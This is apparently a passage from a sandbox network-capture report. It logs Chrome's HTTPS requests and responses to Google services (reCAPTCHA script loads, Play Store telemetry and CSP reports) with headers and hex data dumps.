                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  136192.168.2.650004216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC1216OUTGET /recaptcha/api.js?trustedtypes=true&render=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                  Expires: Sun, 29 Sep 2024 04:53:50 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:50 GMT
                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC641INData Raw: 36 35 32 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                  Data Ascii: 652/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC984INData Raw: 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69
                                                                                                                                                                                                                                  Data Ascii: YffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecati
                                                                                                                                                                                                                                  2024-09-29 04:53:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  137192.168.2.650009142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC1275OUTPOST /play/log?format=json&authuser&proto_v2=true HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 4557
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC4557OUTData Raw: 5b 5b 32 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 57 69 6e 64 6f 77 73 22 2c 6e 75 6c 6c 2c 22 31 30 2e 30 22 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 22 72 75 22 2c 22 63 68 72 6f 6d 65 22 2c 22 31 31 37 2e 30 2e 30 2e 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5c 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 22 3b 76 3d 5c 22 31 31 37 5c 22 2c 20 5c 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 5c 22 3b 76 3d 5c 22 38 5c 22 2c 20 5c 22 43 68 72 6f 6d 69 75 6d 5c 22 3b 76 3d 5c 22 31 31 37 5c 22 22 5d 5d 2c 36 35 2c 5b 5b 22 31 37 32 37 35 38 35 36 32 39 30 35 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c
                                                                                                                                                                                                                                  Data Ascii: [[2,null,[null,null,"Windows",null,"10.0"],null,null,null,null,null,["ru","chrome","117.0.0.0",null,null,null,null,null,null,null,"\"Google Chrome\";v=\"117\", \"Not;A=Brand\";v=\"8\", \"Chromium\";v=\"117\""]],65,[["1727585629053",null,null,null,null,nul
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC685INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://play.google.com
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:51 GMT
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC32INData Raw: 31 61 0d 0a 5b 22 39 30 30 30 30 30 22 2c 22 31 37 32 37 35 38 35 36 33 31 36 33 33 22 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 1a["900000","1727585631633"]
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  138192.168.2.650010142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC1274OUTPOST /play/log?format=json&authuser&proto_v2=true HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 752
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC752OUTData Raw: 5b 5b 32 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 57 69 6e 64 6f 77 73 22 2c 6e 75 6c 6c 2c 22 31 30 2e 30 22 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 22 72 75 22 2c 22 63 68 72 6f 6d 65 22 2c 22 31 31 37 2e 30 2e 30 2e 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5c 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 22 3b 76 3d 5c 22 31 31 37 5c 22 2c 20 5c 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 5c 22 3b 76 3d 5c 22 38 5c 22 2c 20 5c 22 43 68 72 6f 6d 69 75 6d 5c 22 3b 76 3d 5c 22 31 31 37 5c 22 22 5d 5d 2c 36 35 2c 5b 5b 22 31 37 32 37 35 38 35 36 32 39 31 33 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c
                                                                                                                                                                                                                                  Data Ascii: [[2,null,[null,null,"Windows",null,"10.0"],null,null,null,null,null,["ru","chrome","117.0.0.0",null,null,null,null,null,null,null,"\"Google Chrome\";v=\"117\", \"Not;A=Brand\";v=\"8\", \"Chromium\";v=\"117\""]],65,[["1727585629133",null,null,null,null,nul
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC685INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://play.google.com
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:51 GMT
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC32INData Raw: 31 61 0d 0a 5b 22 39 30 30 30 30 30 22 2c 22 31 37 32 37 35 38 35 36 33 31 36 33 34 22 5d 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 1a["900000","1727585631634"]
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  139192.168.2.650011142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC1269OUTPOST /_/PlayStoreUi/cspreport/fine-allowlist HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 1594
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  Content-Type: application/csp-report
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://play.google.com
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: report
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC1594OUTData Raw: 7b 22 63 73 70 2d 72 65 70 6f 72 74 22 3a 7b 22 64 6f 63 75 6d 65 6e 74 2d 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 73 65 61 72 63 68 3f 71 3d 69 6e 73 74 61 67 72 61 6d 26 63 3d 61 70 70 73 26 68 6c 3d 72 75 26 67 6c 3d 55 53 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 76 69 6f 6c 61 74 65 64 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 65 66 66 65 63 74 69 76 65 2d 64 69 72 65 63 74 69 76 65 22 3a 22 73 63 72 69 70 74 2d 73 72 63 2d 65 6c 65 6d 22 2c 22 6f 72 69 67 69 6e 61 6c 2d 70 6f 6c 69 63 79 22 3a 22 73 63 72 69 70 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c
                                                                                                                                                                                                                                  Data Ascii: {"csp-report":{"document-uri":"https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US","referrer":"","violated-directive":"script-src-elem","effective-directive":"script-src-elem","original-policy":"script-src 'unsafe-inline' 'unsafe-eval' bl
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC3301INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:51 GMT
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-ZOam06qnIVUUfXoKhCrGIQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/PlayStoreUi/cspreport;worker-src 'self'
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://market.android.com https://clients2.google.com https://payments.sandbox.google.com https://payments.google.com https://maps.googleapis.com https://translate.googleapis.com https://translate.google.com https://support.google.com https://www.gstatic.cn https://families.google.com https://clients1.google.com https://myaccount.google.com https://accounts.google.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.googleapis.com/appsmarket/v2/installedApps/;report-uri /_/PlayStoreUi/cspreport/allowlist
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.google.com/js/bg/ https://www.gstatic.com/_/boq-play/_/js/k=boq [TRUNCATED]
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  140192.168.2.650019216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:51 UTC693OUTGET /recaptcha/api.js?trustedtypes=true&render=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0 HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
